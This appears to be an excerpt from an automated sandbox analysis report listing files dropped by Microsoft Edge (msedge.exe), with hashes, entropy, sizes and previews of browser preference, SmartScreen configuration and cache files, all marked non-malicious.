                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                        Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                        MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                        SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                        SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                        SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2035665
                                                                                                                                                                                                                                                        Entropy (8bit):4.0015159040679285
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:AiosBfOZRZl4FI1n/+hpxiKK4F4d/QdLRpKw4XcDE0/ZnippayX3JfIhlBKalaDZ:K
                                                                                                                                                                                                                                                        MD5:D5E43D6097973BC55B5E05ACEF0ED413
                                                                                                                                                                                                                                                        SHA1:8B39FB80BB7AEDBEDB2863AABE3CA9793969703B
                                                                                                                                                                                                                                                        SHA-256:54000861DB0995452D03FA41BAF58996EA485F6A775A552DF004C28BF3B48E4C
                                                                                                                                                                                                                                                        SHA-512:1D5CA337D178A753554B9ED9F483AF2603C87FD8EF3CDF2D4AA12AF0F69F4B78349D8659E835B632DFC5CD368E8F8FEE6E401BB95E9E18E1B37D864FFB45DB2B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........| .*..|.....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2035665
                                                                                                                                                                                                                                                        Entropy (8bit):4.0015159040679285
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:AiosBfOZRZl4FI1n/+hpxiKK4F4d/QdLRpKw4XcDE0/ZnippayX3JfIhlBKalaDZ:K
                                                                                                                                                                                                                                                        MD5:D5E43D6097973BC55B5E05ACEF0ED413
                                                                                                                                                                                                                                                        SHA1:8B39FB80BB7AEDBEDB2863AABE3CA9793969703B
                                                                                                                                                                                                                                                        SHA-256:54000861DB0995452D03FA41BAF58996EA485F6A775A552DF004C28BF3B48E4C
                                                                                                                                                                                                                                                        SHA-512:1D5CA337D178A753554B9ED9F483AF2603C87FD8EF3CDF2D4AA12AF0F69F4B78349D8659E835B632DFC5CD368E8F8FEE6E401BB95E9E18E1B37D864FFB45DB2B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........| .*..|.....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:uriCache_
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                        Entropy (8bit):5.005456233727009
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXfSJYVn:YWLSGTt1o9LuLgfGBPAzkVj/T8lPPVn
                                                                                                                                                                                                                                                        MD5:CCF1622A1B6CCBF064FA80814818DB15
                                                                                                                                                                                                                                                        SHA1:0FD145ACC8130FCF86FF46E1DB9C2C6BE192B039
                                                                                                                                                                                                                                                        SHA-256:3F495D5ACD250C023D6B1FDE56C043723CD81C12474E8F97E3F64D221DEDEEE7
                                                                                                                                                                                                                                                        SHA-512:CA40B5AED53E128E208FFE995675E18AE6BA8C3E4F77DBEB16DA044685CA4964B0AE5F342BDCD67130E9EC2C6297108F5719B4FE878560A0BDF03853EFA42F48
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732247372037754}]}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                        SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):45957
                                                                                                                                                                                                                                                        Entropy (8bit):6.087745031024843
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgx9bzNiuChDO6vP6O6arFJNewPJY3xIAB3lMCAocGoup1Xl3j5:mMk1rT8HR9bzX6aarqhTMRochu3VlXrT
                                                                                                                                                                                                                                                        MD5:D9749AFC6092AEC3A69FAE2514DC71DC
                                                                                                                                                                                                                                                        SHA1:75CE76B51A2F712CCDA4EE2EFA6AFE4C2F93E915
                                                                                                                                                                                                                                                        SHA-256:0B32B26603D88EE0E9298BCA1502C0A2025EBC9AF452F02B99BD9CA1B89011A7
                                                                                                                                                                                                                                                        SHA-512:DB204886C8268C31E62B07072EA63B4A05F8C7A97D584564D8D75DAEF58A5357FB8AD49D369F7D821C52A77DF2BB705C3B7BBB9912C76B5AD907C044A3DA46EC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):45910
                                                                                                                                                                                                                                                        Entropy (8bit):6.087951325297144
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgx9bz9iuChDO6vP6O6arFJNewPJY3xIAB3lMCAocGoup1Xl3j5:mMk1rT8HR9bzn6aarqhTMRochu3VlXrT
                                                                                                                                                                                                                                                        MD5:2E0F62E11BDBCE47CE7FFB7B71123273
